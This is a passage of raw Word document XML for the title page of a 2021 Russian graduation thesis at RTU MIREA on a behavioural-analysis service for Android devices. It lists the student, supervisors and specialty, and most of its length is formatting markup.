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left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:caps/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:caps/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70CE70C2" wp14:editId="3AC8C2E8">
                  <wp:extent cx="800100" cy="901700"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="2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left="426" w:hanging="426"/>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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="80" w:lineRule="exact"/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="00000A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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высшего образования</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left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="00000A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>РТУ МИРЭА</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:pBdr>
          <w:top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left="426" w:hanging="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="2823" w:type="pct"/>
        <w:tblInd w:w="4219" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5442"/>
      </w:tblGrid>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>РАБОТА ДОПУЩЕНА К ЗАЩИТЕ</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Заведующий </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>кафедрой ________________О.В. Трубиенко</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:before="120" w:after="120" w:line="480" w:lineRule="auto"/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>«___»_____________20___ г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ВЫПУСКНАЯ КВАЛИФИКАЦИОННАЯ РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="98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53"/>
        <w:gridCol w:w="574"/>
        <w:gridCol w:w="425"/>
        <w:gridCol w:w="1015"/>
        <w:gridCol w:w="299"/>
        <w:gridCol w:w="737"/>
        <w:gridCol w:w="19"/>
        <w:gridCol w:w="122"/>
        <w:gridCol w:w="91"/>
        <w:gridCol w:w="233"/>
        <w:gridCol w:w="190"/>
        <w:gridCol w:w="267"/>
        <w:gridCol w:w="1566"/>
        <w:gridCol w:w="419"/>
        <w:gridCol w:w="235"/>
        <w:gridCol w:w="1957"/>
        <w:gridCol w:w="84"/>
        <w:gridCol w:w="51"/>
      </w:tblGrid>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
            <w:gridSpan w:val="11"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>по направлению подготовки (специальности)</w:t>
            </w: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1566" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>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10.0</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.04</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2192" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="316"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
            <w:gridSpan w:val="11"/>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1566" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">код направления подготовки </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192" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9702" w:type="dxa"/>
            <w:gridSpan w:val="16"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left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Информационно-аналитические системы безопасности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="187"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9702" w:type="dxa"/>
            <w:gridSpan w:val="16"/>
            <w:tcBorders>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r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Наименование специальности</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1553"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на тему:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8149" w:type="dxa"/>
            <w:gridSpan w:val="15"/>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«Разработка сервиса поведенческого ана</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>лиза функционирования мобильных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9702" w:type="dxa"/>
            <w:gridSpan w:val="16"/>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устройств на операционных системах андроид»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="135" w:type="dxa"/>
          <w:trHeight w:val="544"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4744" w:type="dxa"/>
            <w:gridSpan w:val="8"/>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Обучающийся</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="324"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32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4634" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="004A5FE1" w:rsidP="004A5FE1">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Князев Константин Антонович</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:trHeight w:val="127"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2127"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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2476" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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3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233"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4769" w:type="dxa"/>
            <w:gridSpan w:val="8"/>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rPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="13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шифр</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Pr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>15Б0077</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5080"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r>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="11"/>
          <w:wAfter w:w="521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группа</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color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>БИСО-02-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="51" w:type="dxa"/>
          <w:trHeight w:val="65"/>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Руководитель работы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1015"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299"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к.т.н. доцент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="235"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sidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>О.В. Трубиенко</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="51" w:type="dxa"/>
          <w:trHeight w:val="484"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="825"/>
              </w:tabs>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD46FA" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="51" w:type="dxa"/>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="299"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3644" w:type="dxa"/>
            <w:gridSpan w:val="9"/>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к.т.н. доцент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="235"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2041" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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Г.Ю.Потерпеев</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AD46FA" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="51" w:type="dxa"/>
          <w:trHeight w:val="58"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00AD46FA" w:rsidRPr="00583156" w:rsidRDefault="00AD46FA" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Консультант</w:t>
            </w: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99" w:type="dxa"/>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24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3644" w:type="dxa"/>
            <w:gridSpan w:val="9"/>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35" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00AD46FA" w:rsidRPr="00583156" w:rsidRDefault="00AD46FA" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00AD46FA" w:rsidRPr="00583156" w:rsidRDefault="00AD46FA" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00AD46FA">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="51" w:type="dxa"/>
          <w:trHeight w:val="362"/>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78"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2552" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:left="426" w:hanging="426"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Консультант</w:t>
            </w:r>
            <w:r w:rsidR="004A5FE1">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>по экономике</w:t>
            </w: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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:u w:val="single"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>к.э.н. доцент</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68"/>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left="426" w:hanging="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Москва 2021 г.</w:t>
      </w:r>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>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firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:caps/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:caps/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E9FEA5" wp14:editId="25DADAE8">
                  <wp:extent cx="800100" cy="901700"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="2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firstLine="400"/>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tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="80" w:lineRule="exact"/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
